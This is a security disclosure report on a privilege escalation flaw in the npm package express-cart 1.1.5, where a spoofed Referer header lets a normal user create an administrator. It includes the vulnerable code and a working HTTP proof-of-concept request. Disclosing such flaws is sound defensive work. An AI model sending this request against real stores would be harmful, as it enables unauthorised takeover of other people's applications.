I would like to report privilege escalation in the npm module express-cart.
It allows a normal user to add another user with administrator privileges.
module name: express-cartversion:1.1.5npm page: https://www.npmjs.com/package/express-cart
expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal and Authorize.net payments.
[10] weekly downloads
A deficiency in the access control allows normal users from expressCart to add new users to the application. This behavior by itself might be considered a privilege escalation. However, it was also possible to add the user as administrator.
Firstly, I noticed that all the endpoints located in the user.js file are not being restricted by the common.restrict middleware, as the other admin routes do. Also, the endpoint /admin/user/insert does not check if the user is admin before adding a new user, which I guess it would be a unlikely behavior.
The following code is used to check if it is the first time creating a user:
// set the account to admin if using the setup form. Eg: First user account
let urlParts = url.parse(req.header('Referer'));
let isAdmin = false;
if(urlParts.path === '/admin/setup'){
isAdmin = true;
}
As you can see in the above snippet, if you send a request with a Referer containing the string /admin/setup the user added will be considered an admin. For example:
POST /admin/user/insert HTTP/1.1
Host: localhost:1111
Referer: http://localhost:1111/admin/setup
Content-Type: application/x-www-form-urlencoded
Cookie: connect.sid=[NORMAL_USER_COOKIE]
usersName=NEWADMIN&[email protected]&userPassword=password&frm_userPassword_confirm=password
This vulnerability would allow any registered user to create another user with administrator privileges and takeover the application.